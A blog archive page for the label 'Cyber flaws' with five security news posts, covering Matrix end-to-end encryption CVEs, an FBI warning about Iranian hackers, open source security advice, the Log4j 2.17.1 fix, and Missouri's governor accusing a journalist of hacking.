Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Cyber flaws. Show all posts
Vulnerabilities and Exploits
Cyber flaws cyber incident Cyber Vulnerabilities Data theft extortion Flaws Matrix Vulnerabilities and Exploits

A Matrix Update Patches Serious End-to-End Encryption Flaws

Recently the open source Matrix messenger protocol published security warnings on its platform about two critical-severity vulnerabilities that affect the end-to-end encryption in the software development kit (SDK). 

As per the warning statement, the groups of malicious actors are exploiting these vulnerabilities that could break the confidentiality of Matrix communications. The vulnerabilities also allow the threat actors to run man-in-the-middle attacks that expose message contents in a readable form. 

According to the technical data, the users who were using the matrix-js-sdk, matrix-android-sdk2, and matrix-ios-sdk, like Element, Cinny, SchildiChat, Beeper, Circuli, and Synod.im have been hit by the bugs. However, the platform clarified that clients using a different encryption implementation such as Hydrogen, Nheko, ElementX, FluffyChat, Timmy, Syphon, Gomuks, Pantalaimon) are safe from the attacks. 

The vulnerabilities were reported to Matrix by the researchers of Brave Software, the University of Sheffield, and the Royal Holloway University in London. The group published the technical details of the research findings. 

List of the critical severity flaws discovered by the team

 
  • CVE-2022-39255: Same as CVE-2022-39251 but impacting matrix-ios-sdk (iOS clients). 
  • CVE-2022-39251: Protocol-confusion bug in matrix-js-sdk, leading to incorrectly accepting messages from a spoofed sender, possibly impersonating a trusted sender. 

The same flaw makes it possible for malicious home server admins to add backup keys to the target's account. 

  • CVE-2022-39250: Key/Device identifier confusion in SAS verification on matrix-js-sdk, enabling a malicious server administrator to break emoji-based verification when cross-signing is used, authenticating themselves instead of the target user.
  • CVE-2022-39257: Same as CVE-2022-39249 but impacting matrix-ios-sdk (iOS clients).
  • CVE-2022-39248: Same as CVE-2022-39251 but impacting matrix-android-sdk2 (Android clients). 
  • CVE-2022-39249: Semi-trusted impersonation problem in matrix-js-sdk leading to accepting keys forwarded without request, making impersonation of other users in the server possible. Clients mark these messages as suspicious on the recipient's end,  thus dropping the severity of the bug. 
  • CVE-2022-39246: Same as CVE-2022-39249 but impacting matrix-android-sdk2 (Android clients). 
Furthermore, the report detailing listed two problems that are yet to receive an identification number. One of these problems allows malicious actors access to the home server and the second refers to using AES-CTR. 

Read more »
WordPress
Acunetix vulnerability Cyber Attacks Cyber flaws FBI Iranian hackers Ransomware Threat SQL VPNS WordPress

FBI Issued a Warning to U.S Firms Concerning Iranian Hackers

 

The FBI issues a warning concerning Iranian hackers, posing as radical right organization Proud Boys during the 2020 presidential election, have now broadened operations, launching cyberattacks against a variety of industry divisions and spreading propaganda hostile to Saudi Arabia. 

"Over time, as Iranian operators have evolved both the strategic priorities and tradecraft, the hackers have matured into more proficient malicious attackers being capable of performing a whole spectrum of operations," read a Microsoft report.

Ransomware works by encrypting a device's data and making it inaccessible until the hacker receives a ransom payment. 

In a recent alert, the FBI stated, in addition to its election-related operation, the Emennet malicious attacker has been engaged in "conventional cyber exploitation activity," targeting industries such as news, transportation, tourism, oil and petrochemicals, telecoms, and financial services. It has been using VPNs to launch attacks on websites operated by certain software applications, such as WordPress, which cybercriminals can exploit to launch hacks in countries other than the United States, Europe, and the Middle East. 

The hackers employed multiple free source and commercial tools in activities, including SQLmap, Acunetix, DefenseCode, Wappalyzer, Dnsdumpster, Netsparker, wpscan, and Shodan, to mask location. The threat actor picked possible victims during the discovery phase of the hacking operations by browsing the web for prominent corporations representing various sectors. For initial access, the hackers would try to locate flaws in the program. 

"In certain cases, the goal may have been to target a large assortment of networks/websites inside a specific sector rather than a specific target company. Emennet would also attempt to discover hosting/shared hosting services in other scenarios," according to the FBI. 

Users must keep personal anti-virus and anti-malware products up to date, patch obsolete software, and make use of reliable web hosting companies, according to the authorities. In any case, Iran's state-sponsored hacker organizations aren't the only ones who have exploited the BIG-IP flaw.
Read more »
Open Source Software
code execution Cyber flaws Cyber Security Linux Open Source Software

Linux Foundation Expert Advices, Open Source Deployment, Fighting Against Vulnerabilities

 

The Census II study's preliminary findings strongly suggest that open source initiatives require supporting toolsets, infrastructure, people, and good governance in order to function as a stable and healthy upstream project for your company. It's not nearly as horrible as it sounds, because not all flaws can be exploited.

Wheeler cited a report from Synopsys, a software security and IoT (Internet of Things) company – each application has an average of 528 open source components, 84% of codebases have at least one vulnerability, and that the average number of vulnerabilities per codebase is 158. An audit of 1,546 codebases was conducted, with a codebase being defined as "the code and accompanying libraries that make up an application or service." "If you're concerned about security, you'll inspect the software." Nonetheless, open-source is possibly safer, because of the long-standing secure software design principle that "the protective method must not rely on attacker ignorance," as outlined in a 1974 work by Jerome Saltzer and Michael Schroeder.

This is a benefit of open-source software. "The many eyes theory works," Wheeler added. Vulnerable software does not get updated, which is a big part of the problem. Many apps and systems do not update all of the components that they use. This is also true for closed source, although "open source software is used a lot more." 

Developers should "learn how to design and acquire secure software," according to the report, which lists a number of free courses, best practices, and tools. A flaw in test-driven development, according to Wheeler, is that the model of writing a test and then writing the code to make the test pass does not include negative tests, implying that there is a need to test to ensure that things that should not happen do not happen. A failure to include negative tests is one of the major issues in many test suites today. It's how the Apple goto fail vulnerability came to be, according to Wheeler, who was referring to this problem. Use caution while dealing with software that hasn't been utilized in a long time. "There will very certainly be no reviewers if there are no users. It's not a problem if you don't utilize it " If it is still required, the remedy is to "look at it yourself." 

In summation, although the problem is difficult to solve, there are several initiatives that may help. The SPDX project, which specifies the "bill of materials" utilized by a software library or application, and the Open Source Security Metrics (OpenSSF) dashboard, which, though still in its early stages, assists developers and users in assessing the security of specific packages. 
Read more »
Vulnerabilities and Exploit
Apache Server Code Execution Flaw Cyber flaws Flaws remote access Vulnerabilities and Exploit

Log4j 2.17.1 Is Out, And Fixes Yet Another Code Execution Flaw.

 

Apache has published Log4j version 2.17.1, which fixes CVE-2021-44832, a newly found code execution flaw. Prior to that, the most recent version of Log4j, 2.17.0, was considered the safest release to update, however that advice has since changed the Log4j vulnerability resource center to reflect current download trends and statistics for 2.17.1.

CheckMarx researchers have revealed details about the vulnerability in Log4j version 2.17.0, which was just released. Apache released this version a few days after two other patches that addressed the major Log4Shell attack and related problems. By altering the Log4j logging configuration file, attackers might execute remote code on a variety of servers or apps. It's one of the most well-known security weaknesses on the internet, affecting enterprise and government customers who use Log4j versions 2.0 through 2.14.1 in their environments.

Last month, a security researcher discovered yet another zero-day vulnerability in the Apache Log4j Java-based logging library, which threat actors may use to execute malicious code on compromised frameworks. This week, Apache released another version (Log4j rendition 2.17.1) that aims to fix the remote code execution (RCE) flaw in v2.17.0. 

Log4j is a well-known Java library built by the Apache Software Foundation, which is open-source. Designers use it to log error messages in large commercial systems and cloud administrations such as Minecraft, Steam, and Apple iCloud. 

Apache acknowledged the issue in an advisory, describing the moderate-severity flaw (CVSS 6.6) as follows – Attribution link: An attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, which can execute remote code, in Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4).

The new Log4j CVE "only applies if an attacker can already edit the Log4j config file," according to security researcher Kevin Beaumont. "An attacker already owns your web app or host if they can edit your Log4j config file."

One of the most important lessons learned from the events surrounding Log4j is that it is humanly impossible for open source project maintainers to cover every possible attack vector while also correcting known vulnerabilities. This is why community-led vulnerability research and reporting is a benefit to open source. However, if not done properly, it can rapidly become a nuisance. 

"Irresponsible disclosures jeopardize the work of open source projects and their maintainers, and if not handled, this problem will only get worse." 

Another crucial point to note is that unlike the previous four Log4j CVEs revealed thus far, no one was credited with identifying CVE-2021-44832 according to Apache's official warning.
Read more »
Missouri Gov.
Cyber flaws Cyber Threats Data Breach Missouri Gov.

Missouri Gov. Calls Journalist a “Hacker,” who Found Cyber Flaw on Website

 

Earlier this month, St. Louis Post-Dispatch Newspaper reporter Josh Renaud found a flaw on the website of the Missouri Department of Elementary and Secondary Education that had compromised social security numbers and personal credentials of thousands of administrators, public school teachers, and other education personal. 

Two weeks after a newspaper identified a security flaw on a state website, Mike Parson’s administration recruited a third-party cybersecurity institution for further investigation and monitoring of the incident.

Last week Missourian government has signed a legal agreement with Identity Theft Guard Solutions, also known as ID Experts. This company provides facilities regarding data breach attacks and credit monitoring services. The matter came into the limelight when the St. Louis Post-Dispatch discovered suspicious activities in its investigation that potentially compromised the Social Security numbers of 100,000 Missouri teachers. 

However, the legal agreement does not state that the ID Experts will focus on that flaw but it does specify that it will cost state taxpayers around $4.5 million to notify the teachers of the potential breach attacks and facilitate them with credit monitoring services. 

In the wake of the incident, Missouri Government threatened to seek legal action against St. Louis Post-Dispatch journalists who discovered a security flaw. Instead of thanking the journalist, the government was claiming that the journalist is a "hacker" and that the newspaper's reporting is nothing more than a "political vendetta" and "an attempt to embarrass the state and sell headlines for their news outlet." The Republican governor has also held the newspaper “accountable". 

“This matter is serious. The state is committing to bringing to justice anyone who hacked our system and anyone who aided or encouraged them to do so — in accordance with what Missouri law allows AND requires. A hacker is someone who gains unauthorized access to information or content. This individual did not have permission to do what they did. They had no authorization to convert and decode the code,’’ Parson later tweeted.
Read more »
Subscribe to: Posts (Atom)